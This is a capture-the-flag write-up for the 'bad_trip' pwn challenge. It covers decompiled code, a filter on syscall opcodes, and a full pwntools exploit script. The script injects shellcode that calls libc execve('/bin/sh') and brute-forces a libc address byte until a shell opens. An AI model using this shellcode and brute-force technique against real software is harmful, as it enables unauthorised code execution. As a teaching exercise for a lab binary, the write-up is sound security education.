Description

This challenge is a follow up for the challenge Good_trip, it’s just a little more challenging.

Analysis

ELF Binary Information

The binary good_trip is identified as follows:

./bad_trip: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=9d2ca42d57283a1a9ce7b  
2c1b19c5265c2b20826, for GNU/Linux 4.4.0, not stripped

This indicates:

  • Type: ELF 64-bit LSB executable
  • Architecture: x86-64
  • Version: SYSV
  • Linking: Dynamically linked
  • Interpreter: /lib64/ld-linux-x86-64.so.2
  • Build ID: 9d2ca42d57283a1a9ce7b2c1b19c5265c2b20826
  • Target OS: GNU/Linux 4.4.0
  • Stripping: Not stripped (contains symbol table and debugging information)

Security Analysis with checksec

Using the checksec tool, we analyze the security features enabled in the binary:

   Arch:     amd64-64-little  
   RELRO:    Full RELRO  
   Stack:    Canary found  
   NX:       NX enabled  
   PIE:      PIE enabled

Unlike the previous challenge, this binary is built with full RELRO protection, a stack canary for buffer overflow defense, NX enabled to prevent execution from non-executable memory regions, and PIE enabled for randomized address loading.

Decompilation of main Function

The decompiled main function from Ghidra reveals the binary’s process flow. It starts by initializing certain parameters, then allocates a memory region called code using mmap. The program leaks the first 4 bytes of the address of puts, then prompts the user for input with a message, reads up to 0x999 bytes from stdin, and stores them in the code variable. After that, it marks the code memory region as read-only and executable using mprotect. Subsequently, the filter function is called to perform certain checks, and finally, the instructions stored in code are executed using exec:

 
undefined8 main(EVP_PKEY_CTX *param_1)
 
{
  init(param_1);
  code = mmap((void *)0x1337131369,0x1000,7,0x22,-1,0);
  mmap((void *)0x6969696969,0x21000,3,0x22,-1,0);
  printf("here ill give you something to start with %p\n",puts);
  printf("code >> ");
  read(0,code,0x999);
  mprotect(code,0x1000,5);
  filter();
  exec(code);
  return 0;
}
 

Decompilation of filter Function

The filter function decompiled in Ghidra:

 
undefined8 filter(void)
 
{
  int iVar1;
  long in_FS_OFFSET;
  int j;
  int i;
  undefined *local_28 [3];
  long canary;
  
  canary = *(long *)(in_FS_OFFSET + 0x28);
  j = -1;
  local_28[0] = &DAT_00102020; // "\x0f\x05\x00" : syscall
  local_28[1] = &DAT_00102023; // "\x0f\x34\x00" : sysenter
  local_28[2] = &DAT_00102026; // "\xcd\x80\x00" : int 0x80
  while (j = j + 1, j < 0xfff) {
    i = -1;
    while (i = i + 1, i < 3) {
      iVar1 = memcmp(local_28[i],(void *)(code + j),2);
      if (iVar1 == 0) {
        puts("nop, not happening.");
                    /* WARNING: Subroutine does not return */
        exit(-1);
      }
    }
  }
  if (canary != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return 0;
}
 

The filter function checks if the provided code contains specific syscall instructions:

  • Syscall: "\x0f\x05\x00"
  • Sysenter: "\x0f\x34\x00"
  • Int 0x80: "\xcd\x80\x00"

If any of these instructions are found, the function terminates the program by exiting with an exit code of -1, otherwise it returns 0.

Disassembly of exec Function

The exec function disassembly shows:

Dump of assembler code for function exec:  
  0x00000000000011df <+0>:     push   rbp  
  0x00000000000011e0 <+1>:     mov    rbp,rsp  
  0x00000000000011e3 <+4>:     mov    QWORD PTR [rbp-0x8],rdi  
  0x00000000000011e7 <+8>:     mov    rbx,0x0  
  0x00000000000011ee <+15>:    mov    r15,0x0  
  0x00000000000011f5 <+22>:    mov    r14,0x0  
  0x00000000000011fc <+29>:    mov    r9,0x0  
  0x0000000000001203 <+36>:    mov    r8,0x0  
  0x000000000000120a <+43>:    mov    r11,0x0  
  0x0000000000001211 <+50>:    mov    r12,0x0  
  0x0000000000001218 <+57>:    mov    rsp,0x0  
  0x000000000000121f <+64>:    mov    rbp,0x0  
  0x0000000000001226 <+71>:    jmp    rdi  
  0x0000000000001228 <+73>:    nop  
  0x0000000000001229 <+74>:    pop    rbp  
  0x000000000000122a <+75>:    ret  
End of assembler dump.

This code clears some registers and then jumps to the user provided code, it’s worth noting that it doesn’t clear all the registers, so it’s possible to get a leak from the uncleared ones.

Solution

NOTE

There are different ways to solve this challenge. The intended solution was to read the libc address from other registers that were not cleared. My solution wasn’t the most efficient, but it still worked and helped me get the flag. It’s always interesting to explore and discover various solutions to a problem, even when they’re not optimal.

The approach I used, was to leverage the leaked four bytes of the puts address, and as I observed a consistent pattern in the Docker container: the missing part of the libc address was always 0x00007fXX, where XX represents a changing byte. Essentially, I created a shellcode that bruteforces this byte. I fixed one byte on my side and repeatedly ran the program. If the byte didn’t match, the program would crash, but after enough attempts, it would eventually align with our specified byte in its address. Once this alignment occurred, we would gain access to a shell.

Shellcode

First let’s setup the stack, using the previous mapped region:

mov rsp, 0x6969696100;
mov rbp, 0x6969696120
mov rsi, 0;
mov rdx, 0;

Then let’s call execve to gain a shell:

mov rdi, BINSH_ADDRESS;
mov r11, EXECVE_ADDRESS;
call r11;

Script Implementation

We’ll define a random byte b and then calculate libc address from the leak:

libc_address = (0x7f_00_00000000 + (b << 32) + leak) - libc.sym['puts']

We’ll use pwntools’s asm function to compile the assembly code:

payload_header = asm(f'''
            mov rsp, 0x6969696100;
            mov rbp, 0x6969696120
            mov rsi, 0; 
            mov rdx, 0;  
            ''')

Since we’re bruteforcing libc address, we need to keep generating the second part of the payload, for that let’s define a function:

def generate_payload_body(base):
    return asm(f'''            
        mov rdi, {hex(base + binsh)}; 
        mov r11, {hex(base + libc.sym["execve"])};  
        call r11;''')

And here’s our infinite loop, that keeps running the program until we get a response that indicates that we got shell:

while True:
	io = start()
 
	leak = int(io.readline().strip().split(b' ')[-1], 16)
 
	libc_address = (0x7f_00_00000000 + (b << 32) + leak) - libc.sym['puts']
	payload = payload_header + generate_payload_body(libc_address)
 
	io.readuntil(b">>")
	io.sendline(payload)
	io.clean()
 
	io.sendline(b'echo hello there, it is working')
	
	try:
		if len(io.recvuntil(b'working', timeout=1)) > 3:
			break
	except EOFError:
		pass
 
	io.close()

It took more than a 100 attempts, but eventually we got the flag:

AKASEC{pr3f37CH3M_Li8C_4Ddr35532}

Full Script

from pwn import *
from random import randint
 
import logging
 
def start(argv=[], *a, **kw):
    if args.GDB:
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:
        return process([exe] + argv, *a, **kw)
 
gdbscript = '''
init-pwndbg
'''.format(**locals())
 
exe = './bad_trip'
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'warn'
 
libc = ELF("./libc.so.6", checksec=False)
binsh = next(libc.search(b"/bin/sh\x00"))
 
payload_header = asm(f'''
            mov rsp, 0x6969696100;
            mov rbp, 0x6969696120
            mov rsi, 0; 
            mov rdx, 0;  
            ''')
 
def generate_payload_body(base):
    return asm(f'''            
        mov rdi, {hex(base + binsh)}; 
        mov r11, {hex(base + libc.sym["execve"])};  
        call r11;''')
 
with log.progress('Tries', level=logging.WARN) as progress, \
     log.progress('Current libc address', level=logging.WARN) as libc_address_progress:
    tries = 0
    b = 0x49 # selected random byte
 
    while True:
        io = start()
        progress.status(tries)
        tries += 1
 
        leak = int(io.readline().strip().split(b' ')[-1], 16)
 
        libc_address = (0x7f_00_00000000 + (b << 32) + leak) - libc.sym['puts']
        libc_address_progress.status(hex(libc_address))
 
        payload = payload_header + generate_payload_body(libc_address)
 
        io.readuntil(b">>")
        io.sendline(payload)
        io.clean()
 
        io.sendline(b'echo hello there, it is working')
        
        try:
            if len(io.recvuntil(b'working', timeout=1)) > 3:
                break
        except EOFError:
            pass
 
        io.close()
 
io.sendline(b"cat flag.txt")
result = io.clean()
 
if b'akasec' in result.lower() and b'}' in result:
    print('-'*30)
    print(f'Found flag: {result[:result.index(b"}")+1].decode()}')
    
io.interactive()